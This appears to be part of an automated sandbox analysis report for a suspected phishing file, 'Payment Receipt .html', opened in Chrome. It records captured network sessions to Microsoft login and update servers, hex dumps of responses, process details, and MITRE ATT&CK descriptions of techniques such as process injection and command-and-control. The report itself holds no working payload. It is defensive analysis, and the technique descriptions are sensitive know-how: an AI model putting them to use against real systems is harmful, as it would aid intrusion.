2024-04-18 21:27:11 UTC	402	OUT	GET /image.3812524360.1168/raf,360x360,075,t,fafafa:ca443f4786.jpg HTTP/1.1 Host: ih1.redbubble.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-18 21:27:11 UTC	933	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Access-Control-Allow-Headers: DNT,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range Access-Control-Allow-Methods: GET, OPTIONS Access-Control-Allow-Origin: https://www.redbubble.com Access-Control-Expose-Headers: Content-Length,Content-Range Age: 2123811 Cache-Control: max-age=31556952, public Content-Disposition: inline Content-Transfer-Encoding: binary Content-Type: image/jpeg Date: Thu, 18 Apr 2024 21:27:11 GMT Etag: W/"48273ec7955de6b58e1ccbe7525dea9a" Last-Modified: Mon, 25 Mar 2024 07:30:20 GMT Referrer-Policy: strict-origin-when-cross-origin Server: ECS (agb/52E8) X-Cache: HIT X-Content-Type-Options: nosniff X-Download-Options: noopen X-Frame-Options: SAMEORIGIN X-Permitted-Cross-Domain-Policies: none X-Request-Id: 866fb3ec-2c2c-4347-a46a-640147c51840 X-XSS-Protection: 1; mode=block Content-Length: 9489 Connection: close
2024-04-18 21:27:11 UTC	9489	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff ed 00 74 50 68 6f 74 6f 73 68 6f 70 20 33 2e 30 00 38 42 49 4d 04 04 00 00 00 00 00 57 1c 01 5a 00 03 1b 25 47 1c 02 00 00 02 00 00 1c 02 74 00 43 c2 a9 20 64 65 76 65 6c 6f 70 65 72 66 72 69 64 61 79 20 2d 20 68 74 74 70 3a 2f 2f 77 77 77 2e 72 65 64 62 75 62 62 6c 65 2e 63 6f 6d 2f 70 65 6f 70 6c 65 2f 64 65 76 65 6c 6f 70 65 72 66 72 69 64 61 00 ff db 00 43 00 06 04 05 05 05 04 06 05 05 05 07 06 06 07 09 0f 0a 09 08 08 09 13 0d 0e 0b 0f 16 13 17 17 16 13 15 15 18 1b 23 1e 18 1a 21 1a 15 15 1e 29 1f 21 24 25 27 28 27 18 1d 2b 2e 2b 26 2e 23 26 27 26 ff db 00 43 01 06 07 07 09 08 09 12 0a 0a 12 26 19 15 19 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 Data Ascii: JFIFtPhotoshop 3.08BIMWZ%GtC developerfriday - http://www.redbubble.com/people/developerfridaC#!)!$%'('+.+&.#&'&C&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49752	13.107.246.41	443	2312	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-18 21:27:11 UTC	421	OUT	GET /shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e328171091.svg HTTP/1.1 Host: aadcdn.msauth.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-18 21:27:11 UTC	805	IN	HTTP/1.1 200 OK Date: Thu, 18 Apr 2024 21:27:11 GMT Content-Type: image/svg+xml Content-Length: 199 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Wed, 24 May 2023 10:11:49 GMT ETag: 0x8DB5C3F49C21D98 x-ms-request-id: e91746e1-601e-0060-2b72-91a7bc000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240418T212711Z-15497cdd9fdvrvz61z5a9rg5rn00000000tg000000004ftb x-fd-int-roxy-purgeid: 4554691 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-04-18 21:27:11 UTC	199	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 75 8f bd ae c2 30 0c 85 5f 25 32 6b d5 38 3f 88 80 92 0e 77 ea 00 6b 87 bb 21 08 4d a4 d2 22 62 35 3c fe 4d 2e 62 44 b6 e4 63 fb d3 b1 6c d3 3a b2 d7 7d 9a 93 83 40 f4 38 70 9e 73 6e b3 6a 97 e7 c8 25 22 f2 42 00 cb f1 4a c1 81 36 c0 82 8f 63 a0 b7 5e a3 cf 3f cb cb 01 32 64 da 94 84 ce 52 a4 c9 77 e7 94 3c 25 cb df 9d 7d fa 0b 7d 73 b9 c5 69 72 30 2f b3 07 de d9 c7 99 02 bb 3a 38 29 d3 28 1c 84 ec 05 0e 0a 83 5e 75 bb dd 99 a3 30 b5 94 55 af cc 49 c8 46 c9 de 0c 02 7b 5d a8 c2 ee 5b 2d e5 b1 ce ff d5 ef c7 7e a3 b1 46 bd 50 5f ea fe 00 a3 0d 47 ef fa 00 00 00 Data Ascii: u0_%2k8?wk!M"b5<M.bDcl:}@8psnj%"BJ6c^?2dRw<%}}sir0/:8)(^u0UIF{][-~FP_G

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49756	13.107.246.41	443	2312	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-18 21:27:11 UTC	416	OUT	GET /shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1 Host: logincdn.msauth.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-18 21:27:11 UTC	806	IN	HTTP/1.1 200 OK Date: Thu, 18 Apr 2024 21:27:11 GMT Content-Type: image/svg+xml Content-Length: 276 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Wed, 22 Jan 2020 00:38:00 GMT ETag: 0x8D79ED35591CF44 x-ms-request-id: c7e316f0-d01e-0027-2ed7-91a5a3000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240418T212711Z-15497cdd9fdv65lsakdy1qt1yn00000000w0000000006a8a x-fd-int-roxy-purgeid: 67912908 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-04-18 21:27:11 UTC	276	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 95 51 3d 6f c3 20 10 fd 2b 88 ae e6 e0 08 d8 b8 b2 3d 74 ca 90 ae 1d ba 45 8a 6b 5b 22 1f aa 91 c9 cf 2f 67 3b 6e 87 2c 15 f0 80 bb 7b ef 9e a0 1a a7 8e dd cf fe 32 d6 bc 0f e1 f6 2a 65 8c 11 e2 0e ae df 9d d4 4a 29 99 2a 38 8b c3 29 f4 35 d7 86 b3 be 1d ba 3e 2c e7 69 68 e3 db f5 5e 73 c5 14 d3 26 4d de 54 61 08 be 6d 8e e3 d8 86 b1 92 cb ad ba 1d 43 cf 4e 35 7f 47 97 21 82 2d dc 04 ce 98 7d 01 39 16 7e 07 a5 c6 8c d0 09 b0 a5 a1 75 c8 33 d4 de 40 69 8c 98 71 4b cc 9c 55 e5 93 b3 af c1 fb 9a bf 18 45 83 cb bf bd 14 f1 b2 02 94 cd fd 53 fa 1e ff ef e3 ac 04 a0 41 01 aa c0 b4 0e 36 95 97 a4 47 9b 05 67 1d 11 d6 2c 66 33 67 c1 35 46 1b b1 49 9d da d8 47 40 3c 0e 98 4c 2e 3a 60 b5 4e 26 01 3f 52 03 93 0c cf 89 64 b4 b0 28 08 37 Data Ascii: Q=o +=tEk["/g;n,{2eJ)8)5>,ih^s&MTamCN5G!-}9~u3@iqKUESA6Gg,f3g5FIG@<L.:`N&?Rd(7

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49763	23.220.189.216	443

Timestamp	Bytes transferred	Direction	Data
2024-04-18 21:27:14 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-04-18 21:27:14 UTC	467	IN	HTTP/1.1 200 OK Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (chd/073D) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-eus-z1 Cache-Control: public, max-age=207358 Date: Thu, 18 Apr 2024 21:27:14 GMT Connection: close X-CID: 2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49765	23.220.189.216	443

Timestamp	Bytes transferred	Direction	Data
2024-04-18 21:27:14 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-04-18 21:27:15 UTC	535	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Tue, 16 May 2017 22:58:00 GMT ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json X-Azure-Ref: 01uvbYwAAAACkqWtaEMjWQL/4cpisZkorTUVNMzBFREdFMDgxMQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y= Cache-Control: public, max-age=207335 Date: Thu, 18 Apr 2024 21:27:14 GMT Content-Length: 55 Connection: close X-CID: 2
2024-04-18 21:27:15 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49767	40.68.123.157	443

Timestamp	Bytes transferred	Direction	Data
2024-04-18 21:27:22 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=A+RmcGYuYzDHtHH&MD=8+PF+Do3 HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-04-18 21:27:23 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: 95a024bd-c765-404a-9693-aec4ac103e07 MS-RequestId: 028a00e8-b2dc-4ae2-ab34-8baf1cafa61d MS-CV: sx60fzNU7UWgbDnZ.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Thu, 18 Apr 2024 21:27:23 GMT Connection: close Content-Length: 24490
2024-04-18 21:27:23 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-04-18 21:27:23 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49777	40.68.123.157	443

Timestamp	Bytes transferred	Direction	Data
2024-04-18 21:28:01 UTC	306	OUT	GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=A+RmcGYuYzDHtHH&MD=8+PF+Do3 HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-04-18 21:28:01 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "Mx1RoJH/qEwpWfKllx7sbsl28AuERz5IYdcsvtTJcgM=_2160" MS-CorrelationId: 369c64e5-c148-4b88-a4c2-fbdfc973dd6d MS-RequestId: 49a701a7-e54c-4606-88d4-238569b330ad MS-CV: l7i21MIUYkyb9f+h.0 X-Microsoft-SLSClientCache: 2160 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Thu, 18 Apr 2024 21:28:00 GMT Connection: close Content-Length: 25457
2024-04-18 21:28:01 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 51 22 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 db 8e 00 00 14 00 00 00 00 00 10 00 51 22 00 00 20 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 f3 43 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 0d 92 6f db e5 21 f3 43 43 4b ed 5a 09 38 55 5b df 3f 93 99 90 29 99 e7 29 ec 73 cc 4a 66 32 cf 84 32 64 c8 31 c7 11 52 38 87 90 42 66 09 99 87 32 0f 19 0a 09 51 a6 a8 08 29 53 86 4a 52 84 50 df 46 83 ba dd 7b df fb 7e ef 7d ee 7d bf ef 9e e7 d9 67 ef 35 ee b5 fe eb 3f ff b6 96 81 a2 0a 04 fc 31 40 21 5b 3f a5 ed 1b 04 0e 85 42 a0 10 04 64 12 6c a5 de aa a1 d8 ea f3 58 01 f2 f5 67 0b 5e 9b bd e8 a0 90 1d bf 40 88 9d eb 49 b4 87 9b ab 8b 9d 2b 46 c8 c7 c5 19 92 Data Ascii: MSCFQ"DQ" AdCenvironment.cabo!CCKZ8U[?))sJf22d1R8Bf2Q)SJRPF{~}}g5?1@![?BdlXg^@I+F
2024-04-18 21:28:01 UTC	9633	IN	Data Raw: 21 6f b3 eb a6 cc f5 31 be cf 05 e2 a9 fe fa 57 6d 19 30 b3 c2 c5 66 c9 6a df f5 e7 f0 78 bd c7 a8 9e 25 e3 f9 bc ed 6b 54 57 08 2b 51 82 44 12 fb b9 53 8c cc f4 60 12 8a 76 cc 40 40 41 9b dc 5c 17 ff 5c f9 5e 17 35 98 24 56 4b 74 ef 42 10 c8 af bf 7f c6 7f f2 37 7d 5a 3f 1c f2 99 79 4a 91 52 00 af 38 0f 17 f5 2f 79 81 65 d9 a9 b5 6b e4 c7 ce f6 ca 7a 00 6f 4b 30 44 24 22 3c cf ed 03 a5 96 8f 59 29 bc b6 fd 04 e1 70 9f 32 4a 27 fd 55 af 2f fe b6 e5 8e 33 bb 62 5f 9a db 57 40 e9 f1 ce 99 66 90 8c ff 6a 62 7f dd c5 4a 0b 91 26 e2 39 ec 19 4a 71 63 9d 7b 21 6d c3 9c a3 a2 3c fa 7f 7d 96 6a 90 78 a6 6d d2 e1 9c f9 1d fc 38 d8 94 f4 c6 a5 0a 96 86 a4 bd 9e 1a ae 04 42 83 b8 b5 80 9b 22 38 20 b5 25 e5 64 ec f7 f4 bf 7e 63 59 25 0f 7a 2e 39 57 76 a2 71 aa 06 8a Data Ascii: !o1Wm0fjx%kTW+QDS`v@@A\\^5$VKtB7}Z?yJR8/yekzoK0D$"<Y)p2J'U/3b_W@fjbJ&9Jqc{!m<}jxm8B"8 %d~cY%z.9Wvq

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: chrome.exePID: 5608, Parent PID: 4248

General

Target ID:	0
Start time:	23:27:02
Start date:	18/04/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\Payment Receipt .html"
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 2312, Parent PID: 5608

General

Target ID:	2
Start time:	23:27:07
Start date:	18/04/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2260 --field-trial-handle=2188,i,16813835599702316226,1852677476728942210,262144 /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Payment Receipt .html

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

HTML

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

Phishing

Compliance

Networking

System Summary

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Chrome Cache Entry: 63

Chrome Cache Entry: 64

Chrome Cache Entry: 65

Chrome Cache Entry: 66

Chrome Cache Entry: 67

Chrome Cache Entry: 68

Chrome Cache Entry: 69

Chrome Cache Entry: 70

Chrome Cache Entry: 71

Chrome Cache Entry: 72

Chrome Cache Entry: 73

Chrome Cache Entry: 74

Chrome Cache Entry: 75

Chrome Cache Entry: 76

Chrome Cache Entry: 77

Chrome Cache Entry: 78

Chrome Cache Entry: 79

Chrome Cache Entry: 80

Chrome Cache Entry: 81

Static File Info

General

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

Windows Analysis Report
Payment Receipt .html